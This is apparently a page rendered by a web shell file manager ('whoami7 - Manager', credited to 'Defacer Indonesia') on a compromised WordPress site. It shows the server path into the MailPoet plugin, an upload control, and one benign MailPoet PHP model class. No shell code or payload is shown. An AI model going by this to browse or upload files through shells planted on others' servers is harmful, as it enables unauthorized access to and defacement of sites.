whoami7 - Manager
:
/
home
/
techyfnq
/
www
/
wp-content
/
plugins
/
mailpoet
/
lib
/
Models
/
Upload File:
files >> //home/techyfnq/www/wp-content/plugins/mailpoet/lib/Models/StatisticsWooCommercePurchases.php
<?php namespace MailPoet\Models; if (!defined('ABSPATH')) exit; /** * @property int $newsletterId * @property int $subscriberId * @property int $queueId * @property int $clickId * @property int $orderId * @property string $orderCurrency * @property float $orderPriceTotal */ class StatisticsWooCommercePurchases extends Model { public static $_table = MP_STATISTICS_WOOCOMMERCE_PURCHASES_TABLE; // phpcs:ignore PSR2.Classes.PropertyDeclaration }
Copyright ©2021 || Defacer Indonesia